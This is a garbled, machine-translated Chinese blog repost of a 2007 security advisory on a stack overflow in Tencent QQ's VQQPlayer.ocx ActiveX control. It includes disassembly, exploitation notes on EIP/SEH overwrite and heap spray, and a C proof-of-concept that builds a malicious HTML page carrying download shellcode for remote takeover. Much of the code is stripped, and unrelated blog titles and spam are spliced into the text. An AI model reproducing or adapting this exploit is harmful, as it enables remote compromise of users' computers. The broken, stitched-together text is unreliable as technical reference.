| Back to logs list
141564 2007 年 02 月 23 日 21:41 Reading (loading. ..) Comments (5) Category: Personal Diary
QQ developed by Tencent, a IM software in China has a very wide range of users. DSW Avert 200,
In fact, a woman will marry regret - Qzone log,612.31 found in several 0day vulnerabilities QQ and QQ informed official. QQ in 2007.1.1 upgraded. In fact, before this, Phantom Brigade (ph4nt0m) of the axis for these vulnerabilities have been discovered, for some reason has not been released, vulnerabilities are now open, so the details and announce the availability of POC as follows:
QQ of these vulnerabilities are caused due Activex Control, related dll are: VQQPLAYER.OCX, VQQsdl.dll, V2MailActiveX.ocx
successful use of one of them will be able to remotely control the user's computer, because it is activex, so only the user installed QQ, even without the registry, to be successfully used.
several other vulnerabilities are denial of service vulnerability, unenforceable, will not go.
affected version:
Tencent QQ2006 official version and all previous versions. (2007.1.1 patch does not update)
details:
in VQQPLAYER.OCX, because the programmer carelessness, there is a stack overflow, the function returns, you can control the EIP.
Method
vulnerability exists is LaunchP2PShare,
ClassId is {AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}
its prototype is:
[id (0x00000030)]
VARIANT_BOOL LaunchP2PShare (
BSTR szExeName,
long nDuration);
the length of the first parameter is not checked, the long string, will cause a stack overflow.
Phantom Brigade will release a POC code for this, do not use this as an illegal
POC:
----------------------------------------------- -----------------------------------------
/ *
*---------------------------------------------- -------------------------
*
* Tencent QQ VQQPlayer.ocx (all version) 0day
*
*
* Author: axis
* Date: 2006-12-27
* Mail:
axis@ph4nt0m.org
*
* Bug discovered by
axis@ph4nt0m.org
*:
*:
*:
*:
*: Usage: filename [htmlfile]
*: filename.exe localhtml.htm
*
* VQQPlayer.ocx the LaunchP2PShare function in the first argument does not do bounds checking, extended to cover the eip and seh MFC42.dll
* QQ is vc6 compiler, so you can overwrite the return address using the method, but requires coverage is visible before eip and character requirements are relatively harsh
* and overwrite the return address of the Method, and QQ on the installation path, because this is covered from the c: program files encentqqAAAAA ....
Comparison of coverage seh
* general, the use of heap spray method, skip 0x0c0c0c0c execution in shellcode, but it will shut down ie.
*
*
*
*
04534E5F 55 PUSH EBP
04534E60 8BEC MOV EBP, ESP
04534E62 81EC 60060000 SUB ESP, 660
04534E68 53 PUSH EBX
04534E69 33DB XOR EBX, EBX
04534E6B 395D 08 CMP DWORD PTR SS: [EBP +8], EBX
04534E6E 56 PUSH ESI
04534E6F 57 PUSH EDI
04534E70 8BF1 MOV ESI, ECX
04534E72 75 11 JNZ SHORT VQQPLA ~ 1.04534E85
04534E74 C786 8C040000 1> MOV DWORD PTR DS: [ESI +48 C], 12
04534E7E 33C0 XOR EAX, EAX
04534E80 E9 42010000 JMP VQQPLA ~ 1.04534FC7
04534E85 8B45 0C MOV EAX, DWORD PTR SS: [EBP + C]
04534E88 3BC3 CMP EAX, EBX
04534E8A 8945 0C MOV DWORD PTR SS: [EBP + C], EAX
04534E8D 7F 07 JG SHORT VQQPLA ~ 1.04534E96
04534E8F C745 0C 0A00000> MOV DWORD PTR SS: [EBP + C], 0A
04534E96 BF 04010000 MOV EDI, 104
04534E9B 8D85 A0FDFFFF LEA EAX, DWORD PTR SS: [EBP-260]
04534EA1 57 PUSH EDI
04534EA2 53 PUSH EBX
04534EA3 50 PUSH EAX
04534EA4 E8 437F0000 CALL
04534EA9 57 PUSH EDI
04534EAA 8D85 A4FEFFFF LEA EAX, DWORD PTR SS: [EBP-15C]
04534EB0 53 PUSH EBX
04534EB1 50 PUSH EAX
04534EB2 E8 357F0000 CALL
04534EB7 83C4 18 ADD ESP, 18
04534EBA 897D FC MOV DWORD PTR SS: [EBP-4], EDI
04534EBD E8 6E780000 CALL
04534EC2 8B40 04 MOV EAX, DWORD PTR DS: [EAX +4]
04534EC5 8B78 6C MOV EDI, DWORD PTR DS: [EAX +6 C]
04534EC8 8D85 A4FEFFFF LEA EAX, DWORD PTR SS: [EBP-15C]
04534ECE 57 PUSH EDI
04534ECF 50 PUSH EAX
04534ED0 E8 C3250000 CALL VQQPLA ~ 1.04537498
04534ED5 FF75 08 PUSH DWORD PTR SS: [EBP +8]
04534ED8 8D85 A4FEFFFF LEA EAX, DWORD PTR SS: [EBP-15C]
04534EDE 50 PUSH EAX
04534EDF E8 027F0000 CALL; overflow
[ebp-15c] is that QQ installation directory,
[Transfer] Zhou Xing pool of Shell Game Animation, [ebp +8] is that the first parameter passed
shellcode using the add esp, 4dch
pop ebp
retn 24h
Security Exit to return to the upper function in mshtml.dll
*
*------------------------------------------ ------------------------------
* /
# i nclude
# i nclude
# i nclude
FILE * fp = NULL;
char * file = \
char * url = NULL;
/ / Download Shellcode by swan @ 0x557 bypass firewall
/ / added by axis @ ph4n0m balance recovery stack, ie not linked
unsigned char sc [] =
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
char * header =
\
\
\
\
char * trigger =
\
\
\
\
\
/ / print unicode shellcode
void PrintPayLoad (char * lpBuff, int buffsize)
{
int i;
for (i = 0; i {
if ((i% 16) == 0)
{
if (i! = 0)
{
printf (\
fprintf (fp, \
}
else
{
printf (\
fprintf (fp, \
}
}
printf (\
fprintf (fp, \
}
/ / print the header to the back shellcode,
【分享】10种就寝坏风俗 越睡越累 - Qzone日记, and then use \
printf (\
fprintf (fp, \
fflush (fp);
}
void main (int argc, char ** argv)
{
unsigned char buf [1024] = {0};
int sc_len = 0;
if (argc = 3) file = argv [2];
printf (\
fp = fopen (file, \
if (! fp)
{
printf (\
return;
}
/ / build evil html file
fprintf (fp, \
fflush (fp);
memset (buf, 0, sizeof (buf));
sc_len = sizeof (sc) -1;
memcpy (buf, sc, sc_len);
memcpy (buf + sc_len, url, strlen (url));
sc_len + = strlen (url) +1;
PrintPayLoad ((char *) buf, sc_len);
fprintf (fp, \
fflush (fp);
fprintf (fp, \
fflush (fp);
printf (\
}
----------------------------------------------- -----------------------------------------
suggestions:
prohibit activex ie the implementation of
vendor patch:
2007.1.1
vendors have now released an upgrade patch to upgrade your user-QQ!
specific upgrade, which in the QQ system settings automatic updates, click the check for the latest upgrade to OK!
Calvin Klein Outerwear sizing-jimmy choo patent le
Gentle then
Linear Mode
